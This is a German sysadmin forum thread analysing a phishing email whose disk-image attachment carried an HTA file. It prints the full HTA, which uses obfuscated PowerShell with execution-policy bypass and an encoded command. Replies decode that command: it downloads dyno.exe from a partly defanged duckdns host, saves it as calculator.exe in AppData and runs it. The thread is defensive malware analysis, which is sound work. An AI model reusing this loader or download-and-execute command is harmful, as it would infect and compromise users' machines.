wolfble
Goto Top

Phishing Mail mit schädlichen Images in freier Wildbahn (.IMG Datei)

article-picture
Moin Moin an alle

Gestern bekam ich eine EMail mit irgendwelchen komischen Sepa Einzugsankündigungen die man angeblich der angehängten Datei entnehmen kann. Ging so
um 4k .. Autoteile ... ja ne ist klar als Verwaltung käuft man ja immer Autoteile im mittleren vierstelligen Bereich (wenn man nicht grade aus der Branche kommt).

Als Dateianhang war eine .IMG dran (Das hatte ich auch noch nicht, es halt ein Datenträgerimageformat wie .ISO). Größe so 1 MB ..

Das meiste war leer (Ich denke man wollte das nur künstlich aufbladen weil viele Scanner nur bis zu einer gewissen Größe scannen)

In der IMG war eine .HTA Datei mit folgendem Inhalt

<html> <HTA:APPLICATION /> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">  
<meta http-equiv="x-ua-compatible" content="ie=9"> <title>Load HTA</title>   
<script type="text/javascript"> new ActiveXObject("wsCript.SHell").rUn( '"POWERSHell.EXe" pOWeRSHelL.EXe -Ex bYPASs -NoP -w 1 -eC  
CQAJACAAIAAJACAACQAJACAACQAgACAAIAAJAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBFAHEAdQBFAFMAVAAgAAkACQAgACAAIAAgACAACQAJACAAIAAJACAAIAAJAAkAIAAgACAAIAAgAAkAIAAJACAAIAAJACAACQAgACAALQBVAFIAaQAJAAkACQAJAAkACQAJAAkACQAJACAAHSBoAHQAdABwADoALwAvAGwAaQBuAGsAZAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvADEAMQBkAC8AZAB5AG4AbwAuAGUAeABlAB0gCQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAtAG8AdQBUAGYAaQBsAEUAIAAJAAkACQAJAAkACQAJAAkACQAdICQARQBOAFYAOgBBAHAAUABEAEEAVABBAFwAYwBhAGwAYwB1AGwAYQB0AG8AcgAuAGUAeABlAB0gIAAJACAACQAJAAkACQAJAAkACQAgACAACQAgACAAIAAgAAkACQAgAAkAIAAJACAAIAAgACAAIAAgAAkACQAJAAkAIAAgACAAOwAgACAAIAAgACAACQBpAE4AVgBvAGsAZQAtAEUAeABQAFIARQBzAFMAaQBvAE4ACQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAkAHSAkAGUAbgB2ADoAQQBwAHAARABBAHQAYQBcAGMAYQBsAGMAdQBsAGEAdABvAHIALgBlAHgAZQAdIA== ' , 0 ) ;   
</script> </head> <body> <div><a href="javascript:void(0)" onclick="();return false">  
<!DOCTYPE HTML> <html> </html></a></div> </body> </html>

Ok, man kann sich denken was hier versucht wird .. nachdem .ZIP und .RAR wohl kaum noch durchkommt nehmen wir halt was anderes zb. IMG. und hoffen das die .hta irgendwer dann anklickt. Und das läd dann über ein Powershell script Unfug nach.

Interessant wäre es ob man das wieder lesebar machen kann, dann wüsste man was genau von wo nachgeladen wird.

Content-ID: 1078421591

Url: https://administrator.de/contentid/1078421591

Ausgedruckt am: 21.11.2024 um 21:11 Uhr

Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 11:09:43 Uhr
Goto Top
Moin,

Da steht nur bas64-codiert drin:
invoke-webrEquEST -URi http://linkdXXX.duckdnsXXX.orgXXX/XXX11d/XXXdyno.exe -ouTfilE $ENV:ApPDATA\calculator.exe ; iNVoke-ExPREsSioN $env:AppDAta\calculator.exe

Der holt sich also eine dyno.exe udn speichert sie in Appdata als calculator.exe ab und ruft diese auf. Und damit das nciht auffällt, wird Powershell mit bypass udn noprofile aufgerufen.

lks

PS: Die X-e sind von mir, damit da nicht ein Depp einfach draufklickt.

PPS: Kann sein, daß beim Editieren der base64-Ausgabe (base64 -d) ich Zeichen verschluckt habe, aber das dürfte für das verständnis egal sein, was das Ding macht.

P3S: Das gehört zum kleinen Einmaleins des sicherheitsbewußten Admin, sowas selbst herauszufinden. face-smile

P4S: Sowas landet im Fliegenfänger bei mir mehrmals täglich.

P5S:decode base64

Edit: beim editieren Ausgabe war der Parameter von invoke-expression veschwunden.
Fennek11
Fennek11 23.07.2021 aktualisiert um 10:06:31 Uhr
Goto Top
Es ist Base64:

$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))
$DecodedText

und ergibt nach Entfernen einiger Tabs:

invoke-webrEquEST -URi ”http[:]//linkd.duckdns[.]org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?
Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 10:35:38 Uhr
Goto Top
Zitat von @Fennek11:

Es ist Base64:

invoke-webrEquEST -URi ”http://linkd.duckdns.org/11d/dyno.exe” -ouTfilE ”$ENV:ApPDATA\calculator.exe”

Fehlt da noch etwas?

invoke-expression $env:AppDAta\calculator.exe face-smile

lks

Edit: parameter von invoke-Expression ergänzt.
wolfble
wolfble 23.07.2021 um 10:14:12 Uhr
Goto Top
Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...
Lochkartenstanzer
Lochkartenstanzer 23.07.2021 um 10:16:57 Uhr
Goto Top
Zitat von @wolfble:

Mit was hast du das denn decodiert .. Das es Base64 ist habe ich gesehen das ist ja ziemlich charakteristisch, aber ich hab nur kauderwelsch rausbekommen ... Ansonsten ist das so wie ich dachte ...

Mit dem Tool base64 das so ziemlich mit jeder Distribution dabei ist und auch unter Linux mit WSL oder cygwin zur verfügung steht.

Mit den online-Tools aus der google-Suche oben geht das natürlich auch. Man muß nur die Sonderzeichen geschickt interpretieren, die da zwischendrin stehen. face-smile

lks
aqui
aqui 23.07.2021 um 10:21:09 Uhr
Goto Top
wolfble
wolfble 23.07.2021 um 10:26:39 Uhr
Goto Top
Ah ich sehs in meinem alter sieht man nicht mehr so gut face-wink .. die IP geht irgendwo zu ner Strato seite die werden sie dafür missbraucht haben und wenn das bemerkt wird wandern sie zu nächsten ist mit duckdns ja ken Problem .

Also wie immer .oO
Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 10:45:27 Uhr
Goto Top
Übrigens:

Bei Virustotal sind momentan nur 5 Scanner der Meinung, daß es Malware ist, wenn man die URL angibt. Wenn man die datei selbst hochlädt, sind es bei virustotal 10 Scanner, die Malware erkennen.


TGIF

lks

PS. Man sieht aktuell alle paar Minuten, wie immer mehr Scanner die Dateie als Malware detektieren.
aqui
aqui 23.07.2021 aktualisiert um 12:24:41 Uhr
Goto Top
Auf'm Mac darf er gerne mal Powershell versuchen... 🤣
Delta9
Delta9 23.07.2021 um 12:28:36 Uhr
Goto Top
Zitat von @aqui:

Auf'm Mac darf er gerne mal Powershell versuchen... 🤣

Es gibt doch Powershell auf dem MAC face-smile
Lochkartenstanzer
Lochkartenstanzer 23.07.2021 aktualisiert um 12:32:50 Uhr
Goto Top
Zitat von @aqui:

Auf'm Mac darf er gerne mal Powershell versuchen... 🤣

Installieren von PowerShell unter macOS

lks

PS: Für pöhses unter MacOS reicht auch die bash (oder zsh).
aqui
aqui 23.07.2021 um 15:41:06 Uhr
Goto Top
zsh ist schöner ! face-wink
aqui
aqui 25.07.2021 aktualisiert um 12:58:10 Uhr
Goto Top
@wolfble
Wenn's das denn nun war bitte nicht vergessen den Thread dann auch zu schliessen !
Wie kann ich einen Beitrag als gelöst markieren?
wolfble
wolfble 25.07.2021 um 15:51:40 Uhr
Goto Top
Wo ist das denn versteckt?
Ex0r2k16
Ex0r2k16 29.07.2021 um 15:00:31 Uhr
Goto Top
ich habe die Dinger schon vor nem Jahr in der Quarantäne gehabt. Mittlerweile habe ich .img verboten. Feddisch
aqui
aqui 29.07.2021 um 19:07:49 Uhr
Goto Top
Zeit auch den Thread dann langsam mal zu schliessen !
Wie kann ich einen Beitrag als gelöst markieren?
wolfble
wolfble 31.07.2021 um 15:11:04 Uhr
Goto Top
Villeicht bin ich blind aber ich seh hier nichts um das zu tun 🤔